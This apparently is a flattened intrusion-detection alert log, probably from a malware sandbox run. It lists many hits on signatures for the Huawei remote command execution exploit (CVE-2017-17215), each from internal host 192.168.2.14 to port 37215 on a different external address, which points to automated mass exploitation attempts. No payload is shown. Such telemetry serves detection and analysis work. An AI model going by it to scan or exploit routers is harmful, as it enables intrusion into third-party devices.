                                                    07/10/24-08:26:33.248945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3931437215192.168.2.1487.32.234.33
                                                    07/10/24-08:26:26.584785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030037215192.168.2.14197.4.129.6
                                                    07/10/24-08:26:20.156506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764637215192.168.2.1441.108.226.195
                                                    07/10/24-08:26:36.381713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4003837215192.168.2.14182.43.172.17
                                                    07/10/24-08:27:07.361334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3383237215192.168.2.14157.244.111.33
                                                    07/10/24-08:27:22.479791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817837215192.168.2.14157.56.186.37
                                                    07/10/24-08:26:28.811368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4727437215192.168.2.14197.112.195.82
                                                    07/10/24-08:26:57.603262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5991637215192.168.2.14171.177.76.162
                                                    07/10/24-08:26:29.835247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517637215192.168.2.14157.56.106.203
                                                    07/10/24-08:26:18.027188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4970037215192.168.2.1441.103.177.172
                                                    07/10/24-08:26:28.923936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4344237215192.168.2.14157.26.142.124
                                                    07/10/24-08:26:29.863602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631637215192.168.2.14157.240.168.133
                                                    07/10/24-08:27:05.169661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5123237215192.168.2.1414.99.244.118
                                                    07/10/24-08:27:17.023576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3978837215192.168.2.14152.54.143.52
                                                    07/10/24-08:27:24.929002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335637215192.168.2.1441.144.90.214
                                                    07/10/24-08:27:19.230409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5539037215192.168.2.14157.16.237.138
                                                    07/10/24-08:27:24.990906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6072437215192.168.2.14197.198.178.209
                                                    07/10/24-08:27:05.234090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5217837215192.168.2.14197.183.218.237
                                                    07/10/24-08:27:02.852846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4521037215192.168.2.14157.200.234.3
                                                    07/10/24-08:27:19.191147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3992237215192.168.2.14157.120.181.151
                                                    07/10/24-08:26:17.985178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6068837215192.168.2.14157.198.227.135
                                                    07/10/24-08:26:59.683297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516637215192.168.2.1441.56.10.88
                                                    07/10/24-08:27:33.915892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5974037215192.168.2.14157.161.161.216
                                                    07/10/24-08:26:43.542796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5226237215192.168.2.1441.86.218.136
                                                    07/10/24-08:26:20.085617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3454637215192.168.2.14157.122.249.248
                                                    07/10/24-08:26:28.929759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4343837215192.168.2.14197.5.52.119
                                                    07/10/24-08:27:24.949781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5165637215192.168.2.14197.22.117.194
                                                    07/10/24-08:26:25.523896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5132437215192.168.2.14157.76.14.36
                                                    07/10/24-08:27:31.550771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984637215192.168.2.14157.103.195.244
                                                    07/10/24-08:27:33.922247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484437215192.168.2.1441.138.249.10
                                                    07/10/24-08:27:20.509281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3908037215192.168.2.14197.71.137.125
                                                    07/10/24-08:26:36.392573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5604837215192.168.2.1441.3.50.97
                                                    07/10/24-08:26:36.439242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4967237215192.168.2.14173.232.186.142
                                                    07/10/24-08:27:10.675558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4748437215192.168.2.14197.254.209.181
                                                    07/10/24-08:26:18.011299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6088837215192.168.2.14157.140.88.71
                                                    07/10/24-08:27:30.558808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941037215192.168.2.14107.204.218.163
                                                    07/10/24-08:27:10.599679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4022037215192.168.2.14132.237.246.177
                                                    07/10/24-08:26:43.781564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563437215192.168.2.1497.169.216.223
                                                    07/10/24-08:27:03.025097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5421037215192.168.2.14197.255.96.26
                                                    07/10/24-08:26:25.514103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5668037215192.168.2.14151.95.132.105
                                                    07/10/24-08:27:22.901357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4526237215192.168.2.14197.23.226.206
                                                    07/10/24-08:26:49.805971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4662037215192.168.2.14157.250.111.183
                                                    07/10/24-08:27:02.804220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973037215192.168.2.14176.248.169.48
                                                    07/10/24-08:27:19.151496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6059437215192.168.2.14143.139.149.100
                                                    07/10/24-08:26:36.373846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339237215192.168.2.14187.170.206.202
                                                    07/10/24-08:27:27.121135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503037215192.168.2.14177.8.140.201
                                                    07/10/24-08:27:33.934356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158237215192.168.2.1441.158.2.148
                                                    07/10/24-08:27:05.198255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244637215192.168.2.14139.110.118.39
                                                    07/10/24-08:26:47.869388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5487637215192.168.2.1441.168.211.12
                                                    07/10/24-08:26:13.825093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4138637215192.168.2.1441.188.229.131
                                                    07/10/24-08:26:41.429574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3971237215192.168.2.14113.162.233.140
                                                    07/10/24-08:26:25.464984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642837215192.168.2.1441.33.162.36
                                                    07/10/24-08:27:02.674320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4003037215192.168.2.14176.22.80.113
                                                    07/10/24-08:26:38.627693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911837215192.168.2.14197.120.213.207
                                                    07/10/24-08:26:59.651235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359637215192.168.2.1488.175.241.168
                                                    07/10/24-08:26:55.277913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331237215192.168.2.14197.210.49.186
                                                    07/10/24-08:26:13.745015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201037215192.168.2.14147.148.215.139
                                                    07/10/24-08:26:41.305234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4343637215192.168.2.14197.129.223.235
                                                    07/10/24-08:26:45.652224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4316437215192.168.2.1441.47.165.41
                                                    07/10/24-08:26:17.944917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4987037215192.168.2.14197.249.192.116
                                                    07/10/24-08:27:23.930240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5932837215192.168.2.14213.223.8.217
                                                    07/10/24-08:27:33.734254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5647837215192.168.2.1487.144.135.181
                                                    07/10/24-08:26:23.351909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4682437215192.168.2.1441.176.82.218
                                                    07/10/24-08:27:14.807455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5660037215192.168.2.14197.210.85.231
                                                    07/10/24-08:26:31.108287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4602637215192.168.2.1441.165.79.30
                                                    07/10/24-08:26:36.424272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4719237215192.168.2.14153.23.130.187
                                                    07/10/24-08:26:28.630891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4951037215192.168.2.14197.112.0.197
                                                    07/10/24-08:26:59.841961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875037215192.168.2.14197.12.133.128
                                                    07/10/24-08:26:34.193253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5207637215192.168.2.14157.89.156.198
                                                    07/10/24-08:26:48.016890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5350037215192.168.2.14197.243.104.223
                                                    07/10/24-08:27:22.849785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4820837215192.168.2.1441.73.254.80
                                                    07/10/24-08:27:32.558731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4030437215192.168.2.14157.153.255.51
                                                    07/10/24-08:27:19.278203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5034637215192.168.2.14197.222.140.42
                                                    07/10/24-08:27:19.339416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5272637215192.168.2.1460.120.242.107
                                                    07/10/24-08:27:31.530342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079037215192.168.2.1441.176.93.52
                                                    07/10/24-08:26:22.222070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349637215192.168.2.14197.118.100.112
                                                    07/10/24-08:26:59.853366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121837215192.168.2.1441.42.11.101
                                                    07/10/24-08:26:43.756816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891437215192.168.2.14157.120.136.189
                                                    07/10/24-08:27:28.169904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4827637215192.168.2.14157.13.62.118
                                                    07/10/24-08:26:23.308313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607837215192.168.2.14126.167.34.39
                                                    07/10/24-08:26:33.231407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5204037215192.168.2.1483.192.244.86
                                                    07/10/24-08:26:41.560670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927037215192.168.2.1441.220.40.73
                                                    07/10/24-08:27:14.754688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493637215192.168.2.1441.97.0.194
                                                    07/10/24-08:26:31.093186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3834437215192.168.2.14197.233.128.254
                                                    07/10/24-08:27:27.040022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6082637215192.168.2.14157.83.163.169
                                                    07/10/24-08:27:20.396105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4804637215192.168.2.14157.137.194.216
                                                    07/10/24-08:27:33.818731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207237215192.168.2.14157.236.24.169
                                                    07/10/24-08:26:15.858543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5546237215192.168.2.14197.80.190.31
                                                    07/10/24-08:26:23.360757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3868037215192.168.2.1464.250.210.238
                                                    07/10/24-08:27:30.456446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5714037215192.168.2.14197.141.245.166
                                                    07/10/24-08:27:13.761969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5369837215192.168.2.14221.157.227.79
                                                    07/10/24-08:26:43.914560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5628637215192.168.2.14157.240.44.139
                                                    07/10/24-08:26:53.140498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089237215192.168.2.14197.201.169.13
                                                    07/10/24-08:26:14.780604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4578037215192.168.2.14161.88.119.252
                                                    07/10/24-08:26:41.529373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716437215192.168.2.1441.211.158.168
                                                    07/10/24-08:27:32.507738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258437215192.168.2.1452.172.113.204
                                                    07/10/24-08:27:32.577578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392837215192.168.2.14197.26.204.125
                                                    07/10/24-08:26:43.841867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3381637215192.168.2.14157.19.193.128
                                                    07/10/24-08:27:08.427653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807037215192.168.2.14197.240.181.217
                                                    07/10/24-08:27:19.352800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3589837215192.168.2.14197.220.65.41
                                                    07/10/24-08:27:30.554316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4015437215192.168.2.1441.17.123.203
                                                    07/10/24-08:27:02.892178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440437215192.168.2.14157.191.229.46
                                                    07/10/24-08:26:47.985761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5299637215192.168.2.1465.73.230.203
                                                    07/10/24-08:26:41.528499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3424437215192.168.2.14197.236.75.243
                                                    07/10/24-08:26:59.713001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448437215192.168.2.1499.78.42.209
                                                    07/10/24-08:27:17.059656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316437215192.168.2.14157.227.17.10
                                                    07/10/24-08:27:02.880964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3743837215192.168.2.14157.13.81.116
                                                    07/10/24-08:26:14.808905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671237215192.168.2.14197.51.219.208
                                                    07/10/24-08:26:38.608580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671837215192.168.2.1441.86.163.204
                                                    07/10/24-08:26:28.927122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610837215192.168.2.14101.70.46.33
                                                    07/10/24-08:27:07.386314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5254437215192.168.2.14157.60.207.198
                                                    07/10/24-08:27:10.616142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5401637215192.168.2.1441.96.36.54
                                                    07/10/24-08:26:25.518059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865237215192.168.2.1441.226.124.220
                                                    07/10/24-08:26:31.098599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690037215192.168.2.1497.169.142.156
                                                    07/10/24-08:27:30.472766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3337837215192.168.2.1441.250.243.125
                                                    07/10/24-08:26:57.637294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5828637215192.168.2.14205.78.78.128
                                                    07/10/24-08:26:51.988171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896037215192.168.2.1441.175.16.80
                                                    07/10/24-08:26:59.847925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4158637215192.168.2.1446.204.217.22
                                                    07/10/24-08:26:36.358828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4729437215192.168.2.1441.174.34.96
                                                    07/10/24-08:27:16.985379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304837215192.168.2.1441.35.193.65
                                                    07/10/24-08:26:47.827027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4208237215192.168.2.1441.226.243.187
                                                    07/10/24-08:26:17.948399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973437215192.168.2.14197.105.121.218
                                                    07/10/24-08:26:33.204295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188837215192.168.2.14157.21.183.234
                                                    07/10/24-08:27:08.301300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103037215192.168.2.1441.227.0.215
                                                    07/10/24-08:26:13.817964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5586037215192.168.2.14157.27.198.248
                                                    07/10/24-08:27:19.321754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4333437215192.168.2.1474.221.150.202
                                                    07/10/24-08:26:36.409717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5581837215192.168.2.1441.2.185.115
                                                    07/10/24-08:27:28.035789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5237437215192.168.2.14197.145.20.62
                                                    07/10/24-08:26:43.932017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101837215192.168.2.1441.34.0.36
                                                    07/10/24-08:27:05.181070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536237215192.168.2.14157.156.253.81
                                                    07/10/24-08:26:22.275935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4517037215192.168.2.1441.50.235.194
                                                    07/10/24-08:26:34.207017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3905037215192.168.2.1441.45.196.151
                                                    07/10/24-08:26:59.646424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3846237215192.168.2.14197.239.221.233
                                                    07/10/24-08:27:19.198870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4523837215192.168.2.14119.1.41.6
                                                    07/10/24-08:27:24.985108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5429037215192.168.2.14144.209.245.99
                                                    07/10/24-08:26:22.273288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5975237215192.168.2.14124.173.166.61
                                                    07/10/24-08:27:05.083120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5525437215192.168.2.14128.162.76.160
                                                    07/10/24-08:26:31.083408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4322837215192.168.2.14157.253.211.46
                                                    07/10/24-08:26:18.019424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268637215192.168.2.14150.23.235.25
                                                    07/10/24-08:26:29.885713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854037215192.168.2.14197.8.158.75
                                                    07/10/24-08:26:45.636858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4120237215192.168.2.14157.4.103.162
                                                    07/10/24-08:26:28.732264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629837215192.168.2.14183.118.197.246
                                                    07/10/24-08:27:17.093550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5679037215192.168.2.14157.88.68.38
                                                    07/10/24-08:27:20.509874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445037215192.168.2.1492.8.254.208
                                                    07/10/24-08:26:57.663652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3888637215192.168.2.14157.129.236.69
                                                    07/10/24-08:26:42.387437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3357437215192.168.2.14114.101.230.200
                                                    07/10/24-08:26:45.636858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3840837215192.168.2.14197.72.150.132
                                                    07/10/24-08:27:10.558614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5574837215192.168.2.1441.16.21.124
                                                    07/10/24-08:27:24.878345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5264037215192.168.2.14157.235.215.36
                                                    07/10/24-08:26:48.019858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4616037215192.168.2.14157.244.140.93
                                                    07/10/24-08:27:17.071295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520037215192.168.2.14157.221.246.75
                                                    07/10/24-08:26:57.630985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5870837215192.168.2.14157.156.82.170
                                                    07/10/24-08:26:41.334232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4929037215192.168.2.14173.245.37.232
                                                    07/10/24-08:26:33.201607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5045837215192.168.2.14197.19.202.110
                                                    07/10/24-08:26:34.267157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3490437215192.168.2.1441.37.212.88
                                                    07/10/24-08:27:17.044301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027437215192.168.2.14197.59.118.152
                                                    07/10/24-08:27:20.454576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3381037215192.168.2.14122.11.6.75
                                                    07/10/24-08:26:25.464984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000237215192.168.2.14197.212.175.122
                                                    07/10/24-08:26:11.566830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4194837215192.168.2.1492.30.83.197
                                                    07/10/24-08:26:59.814735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628837215192.168.2.1447.28.233.133
                                                    07/10/24-08:27:32.507738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861437215192.168.2.1441.209.24.143
                                                    07/10/24-08:27:34.118425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150037215192.168.2.14197.116.44.29
                                                    07/10/24-08:26:38.552864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4524837215192.168.2.1440.186.5.115
                                                    07/10/24-08:26:43.737696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110837215192.168.2.14167.132.176.190
                                                    07/10/24-08:27:07.272615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3978837215192.168.2.14197.122.2.38
                                                    07/10/24-08:27:17.093189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109437215192.168.2.1441.207.185.4
                                                    07/10/24-08:26:22.237344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4307237215192.168.2.1441.68.124.4
                                                    07/10/24-08:26:34.252438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4621237215192.168.2.14167.76.17.227
                                                    07/10/24-08:26:53.135009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3870237215192.168.2.1441.12.110.224
                                                    07/10/24-08:26:42.393770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850237215192.168.2.14140.35.214.245
                                                    07/10/24-08:26:26.589872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118437215192.168.2.14189.190.93.48
                                                    07/10/24-08:26:28.926952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942237215192.168.2.14157.96.199.7
                                                    07/10/24-08:26:59.714271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5761037215192.168.2.1441.127.37.12
                                                    07/10/24-08:27:23.848972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5960837215192.168.2.14197.239.127.252
                                                    07/10/24-08:26:11.512950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5308837215192.168.2.14197.254.13.134
                                                    07/10/24-08:26:36.368939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947837215192.168.2.14103.32.189.219
                                                    07/10/24-08:27:02.812421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947037215192.168.2.14157.39.244.130
                                                    07/10/24-08:26:43.670311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856237215192.168.2.14197.222.212.193
                                                    07/10/24-08:27:02.997295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4037837215192.168.2.14203.161.21.234
                                                    07/10/24-08:27:32.622738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4037637215192.168.2.1441.18.101.0
                                                    07/10/24-08:27:22.932335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5310437215192.168.2.14105.185.48.232
                                                    07/10/24-08:26:23.290002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5661237215192.168.2.14157.84.92.150
                                                    07/10/24-08:26:25.483820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578437215192.168.2.14197.120.5.196
                                                    07/10/24-08:27:10.561451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5958037215192.168.2.1479.253.41.185
                                                    07/10/24-08:26:59.602276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5791837215192.168.2.14197.153.30.209
                                                    07/10/24-08:26:59.541812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077437215192.168.2.1441.163.127.35
